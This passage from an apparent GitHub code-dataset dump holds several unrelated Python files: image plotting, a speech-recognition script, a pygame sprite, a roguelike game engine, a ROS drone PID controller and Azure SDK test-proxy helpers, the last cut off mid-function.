change\")\naxarr[1,0].axes.yaxis.set_ticks([])\naxarr[1,0].axes.xaxis.set_ticks([])\naxarr[1,0].set_xlabel(im3caption)\n\naxarr[1,1].imshow(img4)\naxarr[1,1].set_title(\"Occlusion\")\naxarr[1,1].axes.yaxis.set_ticks([])\naxarr[1,1].axes.xaxis.set_ticks([])\naxarr[1,1].set_xlabel(im4caption)\n\nfilepathname ='variationZebra'\nplt.tight_layout(pad=2.0)\nplt.savefig(\"figs/\" + filepathname + '.png', format='png', dpi=300)\nplt.savefig(\"figs/\" + filepathname + '.pdf', format='pdf', dpi=300)\nplt.show()\n\n\n##########################\n# topi vs eland\n##########################\n\nimg1 = mpimg.imread('eland.jpg')\nimg2 = mpimg.imread('topi.jpg')\nimg3 = mpimg.imread('thomsons.jpg')\nimg4 = mpimg.imread('grants.jpg')\nplt.rcParams[\"font.family\"] = \"serif\"\nplt.figure(figsize=(8, 6))\nf, axarr = plt.subplots(2, 2)\naxarr[0,0].imshow(img1)\naxarr[0,0].set_title(\"Eland\")\naxarr[0,0].axes.yaxis.set_ticks([])\naxarr[0,0].axes.xaxis.set_ticks([])\n\naxarr[0,1].imshow(img2)\naxarr[0,1].set_title(\"Topi\")\naxarr[0,1].axes.yaxis.set_ticks([])\naxarr[0,1].axes.xaxis.set_ticks([])\n\naxarr[1,0].imshow(img3)\naxarr[1,0].set_title(\"Thomson's Gazelle\")\naxarr[1,0].axes.yaxis.set_ticks([])\naxarr[1,0].axes.xaxis.set_ticks([])\n\naxarr[1,1].imshow(img4)\naxarr[1,1].set_title(\"Grant's Gazelle\")\naxarr[1,1].axes.yaxis.set_ticks([])\naxarr[1,1].axes.xaxis.set_ticks([])\n\nfilepathname ='topiElandGazelle'\nplt.tight_layout(pad=1.5)\nplt.savefig(\"figs/\" + filepathname + '.png', format='png', dpi=300)\nplt.savefig(\"figs/\" + filepathname + '.pdf', format='pdf', dpi=300)\nplt.show()\n\n##########################\n# image stats plot\n##########################\n\nplt.scatter(da['width'][da['img_set2']=='train'], da['height'][da['img_set2']=='train'])\nplt.scatter(da['width'][da['img_set2']=='test'], da['height'][da['img_set2']=='test'])\nplt.show()\n\n","repo_name":"myndrws/ssal_ct","sub_path":"view_data.py","file_name":"view_data.py","file_ext":"py","file_size_in_byte":7263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38944309551","text":"import datetime\nimport logging.config\nimport os\nfrom uuid import uuid4\n\nimport config\nimport services\n\nlogging.config.dictConfig(config.LOGGING_CONFIG)\nlogger = logging.getLogger('voicekit_logger')\n\n\ndef main():\n # Считываем аргументы командной строки\n args = services.create_parser()\n # Пропускаем .wav файл через распознавание голоса\n response = services.voice_recognition(args.filepath)\n transcript = response[0][\"alternatives\"][0][\"transcript\"]\n duration = services.calc_duration(response)\n # Ищем результат\n result = False\n if args.recognition_stage == \"stage_one\":\n result = services.stage_one(transcript)\n elif args.recognition_stage == \"stage_two\":\n result = services.stage_two(transcript)\n # Получаем текущую дату (чтобы вписать одинаковую дату и в лог, и в базу данных) и уникальный id операции\n current_time = datetime.datetime.now()\n operation_id = uuid4()\n # Пишем данные в лог и (при необходимости) в базу данных\n services.write_to_log_info(current_time, operation_id, result, args.phone, duration, transcript)\n if args.write_to_database:\n services.write_to_database(current_time, operation_id, result, args.phone, duration, transcript)\n # Удаляем .wav файл\n try:\n os.remove(args.filepath)\n except FileNotFoundError:\n logger.exception(\"Ошибка во время удаления файла\")\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except Exception:\n 
logger.exception(f\"Ошибка во время выполнения основной программы. Входные данные:\\n{services.create_parser()}\")\n","repo_name":"safeisnotanoption/voicekit_test","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31687574619","text":"import pygame\r\n\r\n\r\nclass Gun():\r\n def __init__(self, screen):\r\n self.screen = screen\r\n self.image = pygame.image.load('image/maxresdefault-removebg-preview.png')\r\n self.rect = self.image.get_rect()\r\n self.screen_rect = screen.get_rect()\r\n self.rect.centerx = self.screen_rect.centerx\r\n self.rect.bottom = self.screen_rect.bottom\r\n self.kright = False\r\n self.kleft = False\r\n self.kup = False\r\n self.kdown = False\r\n\r\n\r\n self.image2 = pygame.image.load('image/91c898b7003c432d990708f93b73cfdf.max-1200x800-removebg-preview.png')\r\n self.rect2 = self.image2.get_rect()\r\n self.rect2.centerx = self.screen_rect.centerx\r\n self.rect2.bottom = self.screen_rect.bottom\r\n self.kright2 = False\r\n self.kleft2 = False\r\n self.kup2 = False\r\n self.kdown2 = False\r\n\r\n def output(self):\r\n self.screen.blit(self.image, self.rect)\r\n self.screen.blit(self.image2, self.rect2)\r\n\r\n def update_gun(self):\r\n if self.kright == True:\r\n self.rect.centerx = 1\r\n if self.kleft == True:\r\n self.rect.centerx += 1\r\n if self.kup == True:\r\n self.rect.bottom -= 1\r\n if self.kdown == True:\r\n self.rect.bottom -= 1\r\n\r\n def update_gun2(self):\r\n if self.kright2 == True:\r\n self.rect2.centerx += 1\r\n if self.kleft2 == True:\r\n self.rect2.centerx += 1\r\n if self.kup2 == True:\r\n self.rect2.bottom -= 1\r\n if self.kdown2 == True:\r\n self.rect2.bottom -= 1","repo_name":"Rusliak/finiii","sub_path":"gun.py","file_name":"gun.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74038634722","text":"#!/usr/bin/python3\n# replacing an element in a list at a specific position\n\n\ndef new_in_list(my_list, idx, element):\n if idx < 0 or idx >= len(my_list):\n copy_it = my_list[:]\n return copy_it\n else:\n copy_em = my_list[:]\n copy_em[idx] = element\n return copy_em\n","repo_name":"emelyne1234/alu-higher_level_programming","sub_path":"python-data_structures/4-new_in_list.py","file_name":"4-new_in_list.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35931065763","text":"import libtcodpy as libtcod\nfrom map import Map\nimport decoder\nfrom player import Player\nfrom renderer import Renderer\n\nrace_decoder = decoder.RaceDecoder('races/')\njob_decoder = decoder.JobDecoder('jobs/')\n\nclass Game:\n LEVEL_UP_BASE = 200\n LEVEL_UP_FACTOR = 150\n MAP_WIDTH = 80\n MAP_HEIGHT = 43\n\n @staticmethod\n def new_game(race, job):\n Game.state = 'playing'\n Game.dungeon_level = 1\n Game.mouse = libtcod.Mouse()\n Game.key = libtcod.Key()\n Game.map = Map(Game.MAP_WIDTH, Game.MAP_HEIGHT)\n\n _fighter_component = race_decoder.decode_race_fighter(race)\n _color = race_decoder.decode_race_color(race)\n _job = job_decoder.decode_job(job)\n _start_equipment = job_decoder.decode_job_equipment(job)\n Game.player = Player(Game.map.origin[0], Game.map.origin[1], libtcod.CHAR_SMILIE, 'Drew',\n _color, fighter_component=_fighter_component, race=race, job=_job, start_equipment=_start_equipment)\n 
Game.map.add_object(Game.player)\n\n Game.renderer = Renderer(Game.map, Game.player)\n Game.renderer.clear_console()\n\n Game.message('Welcome stranger! Prepare to perish in the Tombs of the Ancient Kings.', libtcod.light_green)\n\n @staticmethod\n def message(new_msg, color=libtcod.white):\n Game.renderer.add_message(new_msg, color)\n\n @staticmethod\n def inventory_menu(header):\n if len(Game.player.inventory) == 0:\n options = ['Inventory is empty.']\n else:\n options = []\n for item in Game.player.inventory:\n text = item.name\n if item.equipment and item.equipment.is_equipped:\n text = text + ' (on ' + item.equipment.slot + ')'\n options.append(text)\n\n index = Renderer.menu(header, options, Renderer.INVENTORY_WIDTH)\n if index is None or len(Game.player.inventory) == 0:\n return None\n return Game.player.inventory[index].item\n\n @staticmethod\n def job_menu(header):\n options = []\n abilities = [ability for ability in Game.player.job.abilities if ability['level'] <= Game.player.level]\n for ability in abilities:\n text = ability['name'] + ' (' + str(ability['cost']) + ')'\n options.append(text)\n\n index = Renderer.menu(header, options, Renderer.INVENTORY_WIDTH)\n if index is None:\n return None\n return Game.player.job.abilities[index]\n\n @staticmethod\n def main_menu():\n img = libtcod.image_load('img/menu_background1.png')\n\n while not libtcod.console_is_window_closed():\n Renderer.render_main_screen(img)\n\n choice = Renderer.menu('', ['Play a new game', 'Continue current game', 'Quit'], 24, 0)\n\n if choice == 0:\n Renderer.render_main_screen(img)\n\n races = race_decoder.decode_all_races()\n race = Renderer.menu('Pick a race', races, 15, 0)\n if race is None:\n continue\n\n Renderer.render_main_screen(img)\n\n jobs = job_decoder.decode_all_jobs()\n job = Renderer.menu('Pick a job', jobs, 15, 0)\n if job is None:\n continue\n\n Game.new_game(races[race].lower(), jobs[job].lower())\n Game.run()\n elif choice == 1:\n try:\n Game.run()\n except:\n Game.msgbox('\\n No saved game to load.\\n', 24)\n continue\n elif choice == 2:\n break\n\n @staticmethod\n def msgbox(text, width=50):\n Renderer.menu(text, [], width)\n\n @staticmethod\n def target_tile(max_range=None):\n box = libtcod.console_new(1, 1)\n x = Game.player.x\n y = Game.player.y\n libtcod.console_set_default_background(box, libtcod.orange)\n libtcod.console_clear(box)\n key = Game.key\n\n while (x, y) != (0, 0):\n Game.renderer.render_all()\n Game.renderer.render_names_under_target(x, y)\n Game.renderer.render_target_tile(box, x, y)\n\n key = libtcod.console_wait_for_keypress(True)\n key = libtcod.console_wait_for_keypress(True)\n\n direction = Game.get_direction(key)\n if direction is not None:\n x += direction[0]\n y += direction[1]\n\n else:\n return (None, None)\n\n if direction == (0, 0):\n if Game.map.is_tile_in_fov(x, y) and (max_range is None or Game.player.distance(x, y) <= max_range):\n return (x, y)\n else:\n Game.message('That is out of range.', libtcod.red)\n\n @staticmethod\n def target_monster(max_range=None):\n while True:\n (x, y) = Game.target_tile(max_range)\n if x is None:\n return None\n\n for obj in Game.map.objects:\n if obj.x == x and obj.y == y and obj.fighter and obj != Game.player:\n return obj\n\n @staticmethod\n def target_all_neighbors(x, y, max_range=1):\n monsters = []\n for i in range(int(x - max_range), int(x + max_range + 1)):\n for j in range(int(y - max_range) ,int(y + max_range + 1)):\n obj = Game.map.object_at(i, j)\n if obj is not None and obj.fighter and not obj == 
Game.player:\n monsters.append(obj)\n return monsters\n\n @staticmethod\n def update():\n for object in Game.map.objects:\n object.update()\n\n @staticmethod\n def next_level():\n Game.message('You take a moment to rest, and recover your strength.', libtcod.light_violet)\n Game.player.fighter.heal(.5)\n Game.player.job.regen_mana(.5)\n\n Game.message('You descend deeper into the heart of the dungeon...', libtcod.red)\n Game.dungeon_level += 1\n Game.map = Map(Game.MAP_WIDTH, Game.MAP_HEIGHT)\n Game.player.x = Game.map.origin[0]\n Game.player.y = Game.map.origin[1]\n Game.map.add_object(Game.player)\n\n Renderer.clear_console()\n Game.renderer.map = Game.map\n\n @staticmethod\n def check_level_up():\n level_up_exp = Game.get_exp_to_level()\n\n while Game.player.fighter.xp >= level_up_exp:\n Game.player.level += 1\n Game.player.fighter.xp -= level_up_exp\n Game.message('Your battle skills grow stronger! You reached level ' + str(Game.player.level) + '!', libtcod.yellow)\n\n choice = None\n while choice is None:\n choice = Renderer.menu('Level up! Choose a stat to raise:\\n',\n ['+20 HP, from (' + str(Game.player.fighter.max_hp) + ')',\n '+10 MP, from (' + str(Game.player.job.max_mp) + ')',\n '+1 attack, from (' + str(Game.player.fighter.power) + ')',\n '+1 dexterity, from (' + str(Game.player.fighter.dexterity) + ')'], Renderer.LEVEL_SCREEN_WIDTH)\n\n if choice == 0:\n Game.player.fighter.base_max_hp += 20\n Game.player.fighter.hp += 20\n elif choice == 1:\n Game.player.job.base_max_mp += 10\n Game.player.job.mp += 10\n elif choice == 2:\n Game.player.fighter.base_power += 1\n elif choice == 3:\n Game.player.fighter.base_dexterity += 1\n Game.renderer.render_all()\n\n @staticmethod\n def get_exp_to_level():\n return Game.LEVEL_UP_BASE + Game.player.level * Game.LEVEL_UP_FACTOR\n\n @staticmethod\n def try_pick_up():\n for object in Game.map.objects:\n if object.x == Game.player.x and object.y == Game.player.y and object.item:\n object.item.pick_up()\n return\n Game.message('You wait.', libtcod.green)\n\n @staticmethod\n def get_direction(key):\n if key.vk == libtcod.KEY_UP or key.vk == libtcod.KEY_KP8:\n return (0, -1)\n elif key.vk == libtcod.KEY_DOWN or key.vk == libtcod.KEY_KP2:\n return (0, 1)\n elif key.vk == libtcod.KEY_LEFT or key.vk == libtcod.KEY_KP4:\n return (-1, 0)\n elif key.vk == libtcod.KEY_RIGHT or key.vk == libtcod.KEY_KP6:\n return (1, 0)\n elif key.vk == libtcod.KEY_HOME or key.vk == libtcod.KEY_KP7:\n return (-1, -1)\n elif key.vk == libtcod.KEY_PAGEUP or key.vk == libtcod.KEY_KP9:\n return (1, -1)\n elif key.vk == libtcod.KEY_END or key.vk == libtcod.KEY_KP1:\n return (-1, 1)\n elif key.vk == libtcod.KEY_PAGEDOWN or key.vk == libtcod.KEY_KP3:\n return (1, 1)\n elif key.vk == libtcod.KEY_KP5 or key.vk == libtcod.KEY_ENTER:\n return (0, 0)\n return None\n\n @staticmethod\n def handle_keys():\n Game.key = libtcod.console_wait_for_keypress(True)\n Game.key = libtcod.console_wait_for_keypress(True)\n\n if Game.key.vk == libtcod.KEY_ESCAPE:\n return 'exit'\n\n if Game.state == 'playing':\n #movement keys\n Game.map.fov_recompute = True\n direction = Game.get_direction(Game.key)\n\n if direction is None:\n Game.map.fov_recompute = False\n key_char = chr(Game.key.c)\n\n if key_char == 'a':\n range = Game.player.get_range()\n monster = Game.target_monster(range)\n if monster is not None:\n Game.player.fighter.attack(monster)\n return 'attacked'\n\n elif key_char == 'c':\n level_up_exp = Game.get_exp_to_level()\n Game.msgbox('Character Information\\n\\nLevel: ' + 
str(Game.player.level) + '\\nExperience: ' + str(Game.player.fighter.xp) +\n '\\nExperience to level up: ' + str(level_up_exp) + '\\n\\nMaximum HP: ' + str(Game.player.fighter.max_hp) +\n '\\nMaximum MP: ' + str(Game.player.job.max_mp) + '\\nMp Regen ' + str(Game.player.job.mp_regen) + '/sec' +\n '\\n\\nAttack: ' + str(Game.player.fighter.power) + '\\nDexterity: ' + str(Game.player.fighter.dexterity), Renderer.CHARACTER_SCREEN_WIDTH)\n\n elif key_char == 'd':\n chosen_item = Game.inventory_menu('Press the key next to an item to drop it.\\n')\n if chosen_item is not None:\n chosen_item.drop()\n\n elif key_char == 'g':\n Game.try_pick_up()\n\n elif key_char == 'i':\n chosen_item = Game.inventory_menu('Press the key next to an item to use it.\\n')\n if chosen_item is not None:\n chosen_item.use()\n return 'used-item'\n\n elif key_char == 'j':\n ability = Game.job_menu(\"Press the key next to an ability to use it.\\n\")\n if ability is not None:\n Game.player.use_ability(ability)\n return 'used-ability'\n\n elif key_char == 'l':\n Game.target_tile()\n\n elif key_char == '<':\n if Game.map.stairs.x == Game.player.x and Game.map.stairs.y == Game.player.y:\n Game.next_level()\n\n return 'didnt-take-turn'\n\n elif direction == (0, 0):\n Game.try_pick_up()\n pass\n\n else:\n Game.player.move_or_attack(direction[0], direction[1])\n\n\n @staticmethod\n def run():\n player_action = None\n\n while not libtcod.console_is_window_closed():\n Game.renderer.render_all()\n Game.check_level_up()\n\n player_action = Game.handle_keys()\n\n if player_action == 'exit':\n break\n\n if Game.state == 'playing' and player_action != 'didnt-take-turn':\n Game.update()\n","repo_name":"drewtorg/roguelike","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":12125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34578740834","text":"#!/usr/bin/env python3\n\n\n# Importing the required libraries\n\nfrom vitarana_drone.msg import *\nfrom vitarana_drone.srv import *\nfrom pid_tune.msg import PidTune\nfrom sensor_msgs.msg import Imu, NavSatFix, LaserScan\nfrom std_msgs.msg import Float32, String\nimport rospy\nimport time\nimport tf\n\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nimport cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\n#from pyzbar.pyzbar import decode\n\n\nclass Edrone():\n\t\"\"\"docstring for Edrone\"\"\"\n\tdef __init__(self):\n\t\t#qr_detect\n\t\trospy.init_node('position_controller') #Initialise rosnode \n\t\tself.img = np.empty([])\n\t\tself.image_sub = rospy.Subscriber(\"/edrone/camera/image_raw\", Image, self.image_callback) #Subscribing to the camera topic\n\t\t# This will contain your image frame from camera\n\t\tself.bridge = CvBridge()\n\t\tlogo_cascade = cv2.CascadeClassifier('data/cascade.xml')\n\t\t\n\t\t# Format for drone_command\n\t\tself.cmd_drone = edrone_cmd()\n\t\tself.cmd_drone.rcRoll = 1500\n\t\tself.cmd_drone.rcPitch = 1500\n\t\tself.cmd_drone.rcYaw = 1500\n\t\tself.cmd_drone.rcThrottle = 0\n\n\t\tself.cmd_gripper = Gripper()\n\t\tself.cmd_gripper.activate_gripper = False\n\t\tself.cmd_gripper.result = False\n\n\t\t# The latitude, longitude and altitude of the drone\n\t\tself.latitude = 0\n\t\tself.longitude = 0\n\t\tself.altitude = 0\n\n\t\tself.count = 0\n\t\t# The coordinates in the target postion vector is in the order latitude, longitude and altitude\n\t\tself.build1_target = [18.9990965928, 72.0000664814, 10.75]\n\t\tself.build2_target = 
[18.9990965925, 71.9999050292, 22.2]\n\t\tself.build3_target = [18.9993675932, 72.0000569892, 10.7]\n\t\tself.height_target = 35.00#26.0519618605\n\n\t\tself.Kp = [4000000, 50]\n\t\tself.Ki = [0, 0.32]\n\t\tself.Kd = [5000000, 80]\n\n\t\tself.build1_error = [0, 0, 0, 0, 0]\n\t\tself.build2_error = [0, 0, 0, 0, 0]\n\t\tself.build3_error = [0, 0, 0, 0, 0]\n\t\tself.prev_error = [0, 0, 0 ,0, 0]\n\t\tself.error_sum = [0, 0, 0 ,0, 0]\n\n\t\tself.build1_lat_out = 0\n\t\tself.build1_long_out= 0\n\t\tself.build1_alt_out = 0\n\n\t\tself.build2_lat_out = 0\n\t\tself.build2_long_out = 0\n\t\tself.build2_alt_out = 0\n\n\t\tself.build3_lat_out = 0\n\t\tself.build3_long_out = 0\n\t\tself.build3_alt_out = 0\n\n\t\tself.out_altitude_height = 0\n\n\t\tself.final_latitude = 0\n\t\tself.final_longitude = 0\n\t\tself.final_altitude = 0\n\n\t\tself.min_value = [1450, 1450, 1000]\n\t\tself.max_value = [1550, 1550, 2000]\n\n\t\tself.range1 = 0.0\n\t\tself.range2 = 0.0\n\t\tself.range3 = 0.0\n\t\tself.range4 = 0.0\n\t\tself.range5 = 0.0\n\n\t\tself.x = 0.0\n\t\tself.y = 0.0\n\t\tself.sample_time = 0.060 # in seconds\n\n\t\tself.x_distance = 0.0\n\t\tself.y_distance = 0.0\n\n\t\tself.cmd_pub = rospy.Publisher('/drone_command', edrone_cmd, queue_size=1)\n\t\tself.alt_error = rospy.Publisher('/alt_error',Float32, queue_size=1)\n\t\tself.zero_error = rospy.Publisher('/zero_error',Float32, queue_size=1)\n\t\trospy.Subscriber('/edrone/gps', NavSatFix, self.gps_callback)\n\t\trospy.Subscriber('/edrone/range_finder_bottom', LaserScan, self.range_finder_callback)\n\t\trospy.Subscriber('/edrone/gripper_check', String, self.gripper_check_callback)\n\t\tself.box_attachment_service = rospy.ServiceProxy('/edrone/activate_gripper', Gripper)\n\n\t\n\tdef image_callback(self, data):\n\t\ttry:\n\t\t\tself.img = self.bridge.imgmsg_to_cv2(data, \"bgr8\") # Converting the image to OpenCV standard image\n\t\texcept CvBridgeError as e:\n\t\t\tprint(e)\n\t\t\treturn\n\t\t\n\n\tdef gps_callback(self, msg):\n\t\tself.latitude = msg.latitude\n\t\tself.longitude = msg.longitude\n\t\tself.altitude = msg.altitude\n\n\tdef range_finder_callback(self, msg):\n\t\tself.range_bottom = msg.ranges[0]\n\t\t#rospy.loginfo(self.range_bottom)\n\t\n\tdef gripper_check_callback(self, msg):\n\t\tself.gripper_check = msg.data\n\t\t#rospy.loginfo(self.gripper_check)\n\t\n\tdef marker_detect(self,img_frame):\n\t\timg_width = 400\n\t\thfov_rad = 1.3962634\n\t\tfocal_length = (img_width/2)/math.tan(hfov_rad/2)\n\t\t#print(focal_length)\n\n\t\t#logo_cascade = cv2.CascadeClassifier('data/cascade.xml')\n\n\t\t#img = cv2.imread('data/test_3.png') # Source image\n\t\t#cv2.imshow(\"image\",img)\n\t\tgray = cv2.cvtColor(img_frame, cv2.COLOR_BGR2GRAY)\n\n\t\tlogo = logo_cascade.detectMultiScale(gray, scaleFactor=1.05)\n\n\t\tfor (x, y, w, h) in logo:\n\t\t\tcv2.rectangle(img_frame, (x, y), (x + w, y + h), (255, 255, 0), 2)\n\n\t\tcenterx = x + w/2\n\t\tcentery = y + h/2\n\t\t#cv2.imshow(\"window_name\", image)\t\n\t\t#plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n\t\t#plt.show()\n\n\t\tZ_m = self.range_bottom\n\t\tself.x_distance = centerx*Z_m/focal_length\n\t\tself.y_distance = centery*Z_m/focal_length\n\n\tdef pid(self):\n\t\tself.x = 110692.0702932625 * (self.latitude - 19)\n\t\tself.y = -105292.0089353767 * (self.longitude - 72)\n\t\t#rospy.loginfo(self.altitude)\n\n\t\t#from initial positon to box\n\t\t# Calculating the error\n\t\tself.build1_error[0] = self.build1_target[0] - self.latitude\n\t\tself.build1_error[1] = self.build1_target[1] - 
self.longitude\n\t\tself.build1_error[2] = self.build1_target[2] - self.altitude\n\t\tself.build1_error[3] = self.height_target - self.altitude\n\t\t \n\t\t\n\t\tself.error_sum[0] = self.error_sum[0] + self.build1_error[0]\n\t\tself.error_sum[1] = self.error_sum[1] + self.build1_error[1]\n\t\tself.error_sum[2] = self.error_sum[2] + self.build1_error[2]\n\t\tself.error_sum[3] = self.error_sum[3] + self.build1_error[3]\n\t\t\n\t\tself.build1_lat_out = (self.Kp[0] * self.build1_error[0]) + (self.Ki[0] * self.error_sum[0]) + ((self.Kd[0] * (self.build1_error[0] - self.prev_error[0]))/self.sample_time)\n\t\tself.build1_long_out = (self.Kp[0] * self.build1_error[1]) + (self.Ki[0] * self.error_sum[1]) + ((self.Kd[0] * (self.build1_error[1] - self.prev_error[1]))/self.sample_time)\n\t\tself.build1_alt_out = (self.Kp[1] * self.build1_error[2]) + (self.Ki[1] * self.error_sum[2]) + ((self.Kd[1] * (self.build1_error[2] - self.prev_error[2]))/self.sample_time)\n\n\t\tself.out_altitude_height = (self.Kp[1] * self.build1_error[3]) + (self.Ki[1] * self.error_sum[3]) + ((self.Kd[1] * (self.build1_error[3] - self.prev_error[3]))/self.sample_time)\n\t\t# Changing the previous sum value\n\t\tself.prev_error[0] = self.build1_error[0]\n\t\tself.prev_error[1] = self.build1_error[1]\n\t\tself.prev_error[2] = self.build1_error[2]\n\t\tself.prev_error[3] = self.build1_error[3]\n\n\n\t\tself.count += 1\n\t\trospy.loginfo(self.count)\n\n\t\tif self.count < 200:\n\t\t\trospy.loginfo(\"path1\")\n\t\t\trospy.loginfo(self.count)\n\t\t\tself.cmd_drone.rcRoll = 1500\n\t\t\tself.cmd_drone.rcPitch = 1500\n\t\t\tself.cmd_drone.rcYaw = 1500\n\t\t\tself.cmd_drone.rcThrottle = 1500 + self.out_altitude_height\n\t\t\n\t\tif self.count >= 200 and self.count < 500:\n\t\t\trospy.loginfo(\"path2\")\n\t\t\tself.cmd_drone.rcRoll = 1500 + self.build1_lat_out\n\t\t\tself.cmd_drone.rcPitch = 1500\n\t\t\tself.cmd_drone.rcYaw = 1500\n\t\t\tself.cmd_drone.rcThrottle = 1500 + self.out_altitude_height\n\t\t\trospy.loginfo(self.count)\n\n\t\tif self.count >= 500 and self.count < 1200:\n\t\t\trospy.loginfo(\"path3\")\n\t\t\tself.cmd_drone.rcRoll = 1500 #+ self.build1_lat_out\n\t\t\tself.cmd_drone.rcPitch = 1500 + self.build1_long_out\n\t\t\tself.cmd_drone.rcYaw = 1500\n\t\t\tself.cmd_drone.rcThrottle = 1500 + self.out_altitude_height\n\t\t\trospy.loginfo(self.count)\n\n\t\tif self.count >= 1200 and self.count < 12000:\n\t\t\trospy.loginfo(\"path4\")\n\t\t\tself.cmd_drone.rcRoll = 1500 + self.build1_lat_out\n\t\t\tself.cmd_drone.rcPitch = 1500 + self.build1_long_out\n\t\t\tself.cmd_drone.rcYaw = 1500\n\t\t\tself.cmd_drone.rcThrottle = 1500 + self.out_altitude_height\n\t\t\trospy.loginfo(self.count)\n\t\t\tif self.count == 1400:\n\t\t\t\tmarker_detect(self.img)\n\t\t\trospy.loginfo(self.x_distance)\n\t\t\trospy.loginfo(self.y_distance)\n\n\t\tif self.cmd_drone.rcRoll > self.max_value[0]:\n\t\t\tself.cmd_drone.rcRoll = self.max_value[0]\n\t\telif self.cmd_drone.rcRoll < self.min_value[0]:\n\t\t\tself.cmd_drone.rcRoll = self.min_value[0]\n\t\telse:\n\t\t\tself.cmd_drone.rcRoll = self.cmd_drone.rcRoll\n\n\t\tif self.cmd_drone.rcPitch > self.max_value[1]:\n\t\t\tself.cmd_drone.rcPitch = self.max_value[1]\n\t\telif self.cmd_drone.rcPitch < self.min_value[1]:\n\t\t\tself.cmd_drone.rcPitch = self.min_value[1]\n\t\telse:\n\t\t\tself.cmd_drone.rcPitch = self.cmd_drone.rcPitch\n\n\t\tif self.cmd_drone.rcThrottle > self.max_value[2]:\n\t\t\tself.cmd_drone.rcThrottle = self.max_value[2]\n\t\telif self.cmd_drone.rcThrottle < 
self.min_value[2]:\n\t\t\tself.cmd_drone.rcThrottle = self.min_value[2]\n\t\telse:\n\t\t\tself.cmd_drone.rcThrottle = self.cmd_drone.rcThrottle\n\n\n\n\t\tself.cmd_pub.publish(self.cmd_drone)\n\t\t#publishig errors:\n\t\t#self.alt_error.publish(self.error)\n\t\t#self.zero_error.publish(0.0)\n\n\n\nif __name__ == '__main__':\n\n\te_drone = Edrone()\n\tr = rospy.Rate(1/e_drone.sample_time) # specify rate in Hz based upon your desired PID sampling time, i.e. if desired sample time is 33ms specify rate as 30Hz\n\twhile not rospy.is_shutdown():\n\t\te_drone.pid()\n\t\tr.sleep()","repo_name":"AshutoshGeek/Drone-ROS","sub_path":"scripts/position_controller.py","file_name":"position_controller.py","file_ext":"py","file_size_in_byte":8561,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"3631746122","text":"import logging\nimport six\nimport os\nfrom typing import TYPE_CHECKING\nimport urllib.parse as url_parse\n\nfrom azure.core.exceptions import HttpResponseError, ResourceNotFoundError\nfrom azure.core.pipeline.policies import ContentDecodePolicy\n\n# the functions we patch\ntry:\n from azure.core.pipeline.transport import RequestsTransport\nexcept:\n pass\n\n# the trimming function to clean up incoming arguments to the test function we are wrapping\nfrom azure_devtools.scenario_tests.utilities import trim_kwargs_from_test_function\n\nfrom .config import PROXY_URL\nfrom .helpers import get_http_client, get_test_id, is_live, is_live_and_not_recording, set_recording_id\nfrom .proxy_startup import discovered_roots\nfrom urllib3.exceptions import HTTPError\nimport json\n\nif TYPE_CHECKING:\n from typing import Callable, Dict, Tuple\n from azure.core.pipeline.transport import HttpRequest\n\n# To learn about how to migrate SDK tests to the test proxy, please refer to the migration guide at\n# https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/test_proxy_migration_guide.md\n\n# defaults\nRECORDING_START_URL = \"{}/record/start\".format(PROXY_URL)\nRECORDING_STOP_URL = \"{}/record/stop\".format(PROXY_URL)\nPLAYBACK_START_URL = \"{}/playback/start\".format(PROXY_URL)\nPLAYBACK_STOP_URL = \"{}/playback/stop\".format(PROXY_URL)\n\n\ndef get_recording_assets(test_id: str) -> str:\n \"\"\"Used to retrieve the assets.json given a PYTEST_CURRENT_TEST test id.\"\"\"\n for root in discovered_roots:\n current_dir = os.path.dirname(test_id)\n while current_dir is not None and not (os.path.dirname(current_dir) == current_dir):\n possible_assets = os.path.join(current_dir, \"assets.json\")\n possible_root = os.path.join(current_dir, \".git\")\n\n # we need to check for assets.json first!\n if os.path.exists(os.path.join(root, possible_assets)):\n complete_path = os.path.abspath(os.path.join(root, possible_assets))\n return os.path.relpath(complete_path, root).replace(\"\\\\\", \"/\")\n # we need the git check to prevent ascending out of the repo\n elif os.path.exists(os.path.join(root, possible_root)):\n return None\n else:\n current_dir = os.path.dirname(current_dir)\n\n return None\n\n\ndef start_record_or_playback(test_id: str) -> \"Tuple[str, Dict[str, str]]\":\n \"\"\"Sends a request to begin recording or playing back the provided test.\n\n This returns a tuple, (a, b), where a is the recording ID of the test and b is the `variables` dictionary that maps\n test variables to values. 
If no variable dictionary was stored when the test was recorded, b is an empty dictionary.\n \"\"\"\n variables = {} # this stores a dictionary of test variable values that could have been stored with a recording\n\n json_payload = {\"x-recording-file\": test_id}\n assets_json = get_recording_assets(test_id)\n if assets_json:\n json_payload[\"x-recording-assets-file\"] = assets_json\n\n encoded_payload = json.dumps(json_payload).encode(\"utf-8\")\n http_client = get_http_client()\n\n if is_live():\n result = http_client.request(\n method=\"POST\",\n url=RECORDING_START_URL,\n body=encoded_payload,\n )\n if result.status != 200:\n message = six.ensure_str(result.data)\n raise HttpResponseError(message=message)\n recording_id = result.headers[\"x-recording-id\"]\n\n else:\n result = http_client.request(\n method=\"POST\",\n url=PLAYBACK_START_URL,\n body=encoded_payload,\n )\n if result.status != 200:\n message = six.ensure_str(result.data)\n raise HttpResponseError(message=message)\n\n try:\n recording_id = result.headers[\"x-recording-id\"]\n except KeyError as ex:\n six.raise_from(ValueError(\"No recording file found for {}\".format(test_id)), ex)\n if result.data:\n try:\n variables = json.loads(result.data.decode(\"utf-8\"))\n except ValueError as 